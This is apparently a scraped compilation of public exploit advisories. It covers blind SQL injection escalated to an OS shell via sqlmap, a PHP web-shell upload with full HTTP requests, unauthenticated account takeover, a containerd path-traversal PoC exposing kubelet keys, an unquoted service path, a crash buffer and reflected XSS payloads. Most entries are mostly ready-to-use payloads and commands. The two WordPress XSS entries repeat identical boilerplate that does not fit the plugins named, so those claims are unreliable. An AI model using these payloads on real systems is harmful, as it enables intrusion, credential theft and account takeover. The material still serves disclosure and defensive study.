<pre><code># Title: Sports Complex Booking System 1.0 Blind SQLi To Rce<br /># Author: Hejap Zairy<br /># Date: 24.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /><br />#vulnerability Code php<br /><br />```php<br />if(isset($_GET['id']) && $_GET['id'] > 0){<br /> $qry = $conn->query("SELECT f.*, c.name as category from `facility_list` f inner join category_list c on f.category_id = c.id where f.id = '{$_GET['id']}' ");<br /> if($qry->num_rows > 0){<br /> foreach($qry->fetch_assoc() as $k => $v){<br /> $$k=stripslashes($v);<br /> }<br /> }<br />}```<br /><br /><br /><br /><br />#Status: CRITICAL<br />```<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: p=view_facility&id=4' AND 1013=1013-- aQIm<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: p=view_facility&id=4' OR (SELECT 7626 FROM(SELECT COUNT(*),CONCAT(0x71716a7671,(SELECT (ELT(7626=7626,1))),0x71787a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SkTl<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: p=view_facility&id=4' AND (SELECT 5013 FROM (SELECT(SLEEP(5)))lCeY)-- pdUo<br />---<br /><br />```<br />#Blind SQLi Time to Rce<br />#ُExploit <br /><br /><br />sqlmap -u 'http://0day.gov/scbs/?p=view_facility&id=4' --hex --time-sec=17 --dbms=mysql --technique=t --random-agent --eta -p id -D scbs -T users --dump --os-shell <br /><br /># Description:<br />The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc<br /><br /># Proof and Exploit:<br />https://i.imgur.com/nY9GR9F.png<br /></code></pre>
<pre><code># Exploit Title: Trend Micro Virtual Mobile Infrastructure (TMVMI) version 6 - Denial of Service (PoC)<br /># Date: 24/03/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.trendmicro.com/<br /># Software Link: App Store for iOS devices<br /># Version: 6.0.1278<br /># Tested: iPhone 6 iOS 12.4.7<br /># Vulnerability Type: Denial of Service (DoS) Local<br /># Contact: https://twitter.com/dmaral3noz<br /><br /><br /># Steps to Produce the Crash:<br />1- Run python code: TMVMI_6.py<br />2- Copy content to clipboard<br />3- Open TMVMI Client<br />4- Paste ClipBoard on "address"<br />5- Click Next<br />6- Crashed<br /><br /><br />------------------------- <br />TMVMI_6.py<br />-------------------------<br /><br />#!/usr/bin/env python<br /><br />buffer = "\x41" * 1500<br />print (buffer)<br /></code></pre>
<pre><code># Exploit Title: Foxit PDF Editor (iOS) - Arbitrary File Upload (Unauthenticated)<br /># Date: 24/03/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.foxit.com<br /># Software Link: https://apps.apple.com/us/app/foxit-pdf-editor/id507040546<br /># Version: 11.3.1<br /># Tested: iPhone 6 iOS 12.4.7<br /># Contact: https://twitter.com/dmaral3noz<br /><br /><br />- Description :<br /><br />An arbitrary file upload web vulnerability has been discovered in the Foxit PDF Editor v11.3.1 iOS mobile application.<br />The web vulnerability allows remote attackers to upload arbitrary files to compromise for example the file system of a service<br /><br />- Steps : <br /><br />1- Download and install the Foxit PDF Editor iOS application<br />2- open App and go to Files<br />3- Click Pc (File transfer with wifi)<br />4- Enable File Transferring <br />5- Index of Documents (http://localhost:8888) , you can upload any extension <br /><br /><br />- Request :<br /><br />POST / HTTP/1.1<br />Host: localhost:8888<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-us<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryC2M8Dmj739BtPV2n<br />Origin: http://localhost:8888<br />User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/604.1<br />Connection: close<br />Upgrade-Insecure-Requests: 1<br />Referer: http://localhost:8888/<br />Content-Length: 304<br /><br />------WebKitFormBoundaryC2M8Dmj739BtPV2n<br />Content-Disposition: form-data; name="button"; filename="s3od.php"<br />Content-Type: application/octet-stream<br /><br />0xSaudi<br />------WebKitFormBoundaryC2M8Dmj739BtPV2n<br />Content-Disposition: form-data; name="button"<br /><br />Upload<br />------WebKitFormBoundaryC2M8Dmj739BtPV2n--<br /><br /><br />****************************<br /><br />Path File : http://localhost:8888/s3od.php <br /><br />****************************<br /></code></pre>
<pre><code># Title: Sports Complex Booking System 1.0 Shell Upload<br /># Author: Hejap Zairy<br /># Date: 24.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br />registered user can bypass waf upload .php.png files in attachments section with use of intercept tool in burbsuite to edit the raw<br /><br /><br />#vulnerability Code php<br />Needs more filtering to upload profile files<br /><br />php```<br /> window.displayImg = function(input,_this) {<br /> if (input.files && input.files[0]) {<br /> var reader = new FileReader();<br /> reader.onload = function (e) {<br /> $('#cimg').attr('src', e.target.result);<br /> _this.siblings('.custom-file-label').html(input.files[0].name)<br /> }<br /><br /> reader.readAsDataURL(input.files[0]);<br /> }else{<br /> $('#cimg').attr('src', "<?php echo validate_image(isset($image_path) ? $image_path : "") ?>");<br /> _this.siblings('.custom-file-label').html("Choose file")<br /> }<br /> }<br />```<br /><br /><br />[+] Payload POST<br /><br /><br />```<br />POST /scbs/?p=manage_account HTTP/1.1<br />Host: 0day.gov<br />Cookie: PHPSESSID=2vah9hmhjf85ichdav814rhcgu<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------409902128312379197203124536738<br />Content-Length: 882<br />Origin: https://0day.gov<br />Referer: https://0day.gov/scbs/<br />Upgrade-Insecure-Requests: 1<br />Te: trailers<br />Connection: close<br /><br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="productName"<br />Hejap Zairy<br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="productimage1"; filename="0day_hejap.php"<br />Content-Type: image/png<br /><br /><?=`$_GET[515]`?><br /><br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="submit"<br />-----------------------------409902128312379197203124536738--<br />```<br /><br /><br />#Status: CRITICAL<br /><br />[+] Payload GET<br /><br />```<br />GET /scbs/dist/img/0day_hejap.php?515=echo%200day%20hejap%20Zairy HTTP/1.1<br />Host: 0day.gov<br />Cookie: PHPSESSID=2vah9hmhjf85ichdav814rhcgu<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Upgrade-Insecure-Requests: 1<br />Te: trailers<br />Connection: close<br />```<br /><br />#Response <br />```<br />HTTP/1.1 200 OK<br />Date: Sun, 20 Mar 2022 08:04:28 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-Powered-By: PHP/7.4.27<br />Content-Length: 17<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />0day hejap Zairy<br />```<br /><br /><br /># Description:<br />The file upload bypass WAF vulnerability occurs when the user uploads an executable script file, and through the script file to obtain the ability to execute server-side commands. This attack is the most direct and effective, sometimes having almost no technical barriers.<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/us3lA1l.png<br /></code></pre>
<pre><code># Exploit Title: Online Sports Complex Booking System - 'id' Blind SQL Injection<br /># Date: 24/03/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /><br /><br /><br /># Vulnerable Code<br /><br />line 3 in file "/scbs/view_facility.php"<br /><br />$qry = $conn->query("SELECT f.*, c.name as category from `facility_list` f inner join category_list c on f.category_id = c.id where f.id = '{$_GET['id']}' ");<br /><br /><br /># Sqlmap command:<br /><br />sqlmap -u 'http://localhost/scbs/?p=view_facility&id=1' -p id --level=5 --risk=3 --dbs --random-agent --eta<br /><br /># Output:<br /><br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: p=view_facility&id=1' AND 9877=9877 AND 'MVfb'='MVfb<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: p=view_facility&id=1' AND (SELECT 8456 FROM (SELECT(SLEEP(5)))ZnUC) AND 'GiOo'='GiOo<br /><br /></code></pre>
<pre><code># Exploit Title: Online Sports Complex Booking System - Account Takeover (Unauthenticated) <br /># Date: 24/03/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /><br /><br /># Description :<br /><br />Online Sports Complex Booking System is vulnerable to unauthenticated account takeover.<br />An attacker can takeover any registered 'Staff' user account by just sending below POST request<br />By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters<br /><br /># Steps to Reproduce :<br /><br />1. Send the below POST request by changing "id", "firstname", "lastname" , "username" , "password" parameters.<br /><br />2. Go to http://localhost/scbs/admin/ and Log in to the user account by changed username and password<br /><br /><br />======<br /><br />POST /scbs/classes/Users.php?f=save HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------11619114222641896828949561514<br />Content-Length: 811<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/scbs/admin/?page=user<br />Cookie: PHPSESSID=2knksvuc4mgojfd9enhccg08sn<br /><br />-----------------------------11619114222641896828949561514<br />Content-Disposition: form-data; name="id"<br /><br />1<br />-----------------------------11619114222641896828949561514<br />Content-Disposition: form-data; name="firstname"<br /><br />Adminstrator<br />-----------------------------11619114222641896828949561514<br />Content-Disposition: form-data; name="lastname"<br /><br />Admin<br />-----------------------------11619114222641896828949561514<br />Content-Disposition: form-data; name="username"<br /><br />admin<br />-----------------------------11619114222641896828949561514<br />Content-Disposition: form-data; name="password"<br /><br />admin<br />-----------------------------11619114222641896828949561514<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------11619114222641896828949561514--<br /></code></pre>
<pre><code>containerd: Insecure handling of image volumes<br /><br />containerd's cri plugin handles image volumes containing path traversals insecurely. This can be used to copy arbitrary host directories to a container-mounted path.<br /><br />OCI images contain a JSON config file described in https://github.com/opencontainers/image-spec/blob/main/config.md. As part of this config,<br />an image can specify \u"Volumes\u" which describe \u2018where the process is likely to write data specific to a container instance' when the image is used to run a container.<br /><br />When this configuration is converted into an OCI runtime config, containerd tries to follow the spec at https://github.com/opencontainers/image-spec/blob/main/conversion.md:<br /><br />\u"Implementations SHOULD provide mounts for these locations such that application data is not written to the container's root filesystem. If a converter implements conversion for this field using mountpoints, it SHOULD set the destination of the mountpoint to the value specified in Config.Volumes. An implementation MAY seed the contents of the mount with data in the image at the same location\u" <br /><br />The seeding is implemented in (*criService).CreateContainer (cri/server/container_create.go)<br /><br />var volumeMounts []*runtime.Mount<br />if !c.config.IgnoreImageDefinedVolumes {<br /> // Create container image volumes mounts.<br /> volumeMounts = c.volumeMounts(containerRootDir, config.GetMounts(), <br /> &image.ImageSpec.Config)<br />} else if len(image.ImageSpec.Config.Volumes) != 0 {<br /> ....<br />}<br /><br /><br />func (c *criService) volumeMounts(..) .. <br />var mounts []*runtime.Mount<br />\u2026<br />for dst := range config.Volumes {<br /> \u2026<br /> volumeID := util.GenerateID()<br /> src := filepath.Join(containerRootDir, \"volumes\", volumeID)<br /> mounts = append(mounts, &runtime.Mount{<br /> ContainerPath: dst,<br /> HostPath: src,<br /> SelinuxRelabel: true,<br /> })<br /> }<br /> return mounts<br />}<br /><br /><br />Image volume mounts are only supported if IgnoreImageDefinedVolumes is false. While the description mentions that this flag is \u"Useful for better resource isolation, security\u2026\u" the default is false and none of the major containerd users seems to overwrite this. <br /><br />So in the default config, c.VolumeMounts will be called to create new runtime.Mount entries for all Volumes listed in the image config. There is no validation of the listed paths and the .ContainerPath attribute is completely image/attacker controlled.<br /><br />Later in the execution, the harmless HostPaths and the attacker controlled ContainerPaths are passed to the customopts.WithVolumes method. While the HostPath is cleaned, ContainerPath is passed through without changes:<br /> if len(volumeMounts) > 0 {<br /> mountMap := make(map[string]string)<br /> for _, v := range volumeMounts {<br /> mountMap[filepath.Clean(v.HostPath)] = v.ContainerPath<br /> }<br /> opts = append(opts, customopts.WithVolumes(mountMap))<br /> }<br /><br /><br />The WithVolumes function (pkg/cri/opts/container.go) now tries to copy all files that are under ContainerPath in the container rootfs to the temporary directory at HostPath that will be later mounted into the Container at the same location (This is the optional \u"seeding\u" step described in the spec):<br />for host, volume := range volumeMounts {<br /> // The volume may have been defined with a C: prefix, which we can't use here.<br /> volume = strings.TrimPrefix(volume, \"C:\")<br /> for _, mountPath := range mountPaths {<br /> src := filepath.Join(mountPath, volume)<br /> if _, err := os.Stat(src); err != nil {<br /> if os.IsNotExist(err) {<br /> // Skip copying directory if it does not exist.<br /> continue<br /> }<br /> <br />\u2026<br /> }<br /> <br />if err := copyExistingContents(src, host); err != nil {<br /> \u2026 }<br /> <br />volume is the fully attacker controlled ContainerPath, mountPath a host directory pointing to a part of the containers rootfs. By setting volume to a path like \u"/../../../../../../../../../etc\u", src will become \u"/etc\u" and the copyExistingContents function in the last line will recursively copy the /etc/directory to host. As the directory specified by host will later be mounted into the container, this gives the container full read access to arbitrary files and directories.<br />Suggested Fix:<br />mountMap[filepath.Clean(v.HostPath)] = filepath.Clean(v.ContainerPath)<br />should be sufficient to fix the issue. (But it might be reasonable to surface/log misbehaving images?)<br /><br />Proof-of-Concept:<br />fwilhelm ~ % buildah inspect volumes-test | jq '.OCIv1.config.Volumes'<br />{<br /> \"/../../../../../../../../var/lib/kubelet/pki/\": {}<br />}<br />fwilhelm ~ % kubectl run shell --rm -i --tty --image europe-west3-docker.pkg.dev/[redacted]/test/volumes-test -- /bin/sh <br />/ # mount | grep /var/lib/kubelet<br />/dev/root on /var/lib/kubelet/pki type ext4 (rw,relatime)<br />/ # ls -la /var/lib/kubelet/pki/<br />total 20<br />drwxrwxrwt 2 root root 4096 Nov 12 15:54 .<br />drwxr-xr-x 3 root root 4096 Nov 12 15:54 ..<br />-rw-r--r-- 1 root root 1135 Nov 4 08:59 kubelet-client.crt<br />-rw------- 1 root root 227 Nov 4 08:59 kubelet-client.key<br />-rw------- 1 root root 0 Nov 4 08:59 kubelet-client.lock<br />-rw------- 1 root root 1496 Nov 4 08:59 kubelet-server-2021-11-04-08-59-06.pem<br />lrwxrwxrwx 1 root root 59 Nov 4 08:59 kubelet-server-current.pem -> /var/lib/kubelet/pki/kubelet-server-2021-11-04-08-59-06.pem<br /><br />Let me know if you need access to the POC image, I did not want to spam the full list with it. <br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-02-21. For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html<br /><br />Related CVE Numbers: CVE-2022-23648.<br /><br /><br /><br />Found by: fwilhelm@google.com<br /><br /></code></pre>
<pre><code># Exploit Title: ProtonVPN 1.26.0 - Unquoted Service Path<br /># Date: 22/03/2022<br /># Exploit Author: gemreda (@gemredax)<br /># Vendor Homepage: https://protonvpn.com/<br /># Software Link: https://protonvpn.com/<br /># Version: 1.26.0<br /># Tested: Windows 10 x64<br /># Contact: gemredax@pm.me<br /><br />PS C:\Users\Emre> sc.exe qc "ProtonVPN Wireguard"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: ProtonVPN Wireguard<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 3 DEMAND_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.WireGuardService.exe C:\ProgramData\ProtonVPN\WireGuard\ProtonVPN.conf<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : ProtonVPN WireGuard<br /> DEPENDENCIES : Nsi<br /> : TcpIp<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />#Exploit:<br /><br />The product uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path.<br />If a malicious individual has access to the file system, it is possible to elevate privileges by inserting such a file as "C:\Program.exe" to be run by a privileged program making use of WinExec.<br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Akismet Spam Protection v4.2.2 - Cross Site Scripting (XSS)<br /># Date: 2022-03-22<br /># Author: Milad karimi<br /># Software Link: https://wordpress.org/plugins/akismet<br /># Version: 4.2.2<br /># Tested on: Windows 11<br /># CVE: N/A<br /><br />1. Description:<br />This plugin creates a Akismet Spam Protection from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.<br /><br />2. Proof of Concept:<br />http://localhost/akismet/akismet.php?id=<script>alert("test")</script><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Contact Form 7 v5.5.6 - Cross Site Scripting (XSS)<br /># Date: 2022-03-22<br /># Author: Milad karimi<br /># Software Link: https://wordpress.org/plugins/contact-form-7<br /># Version: 5.5.6<br /># Tested on: Windows 11<br /># CVE: N/A<br /><br />1. Description:<br />This plugin creates a Contact Form 7 from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.<br /><br />2. Proof of Concept:<br />http://localhost/contact-form-7/admin/admin.php?page=<script>alert("test")</script><br /></code></pre>
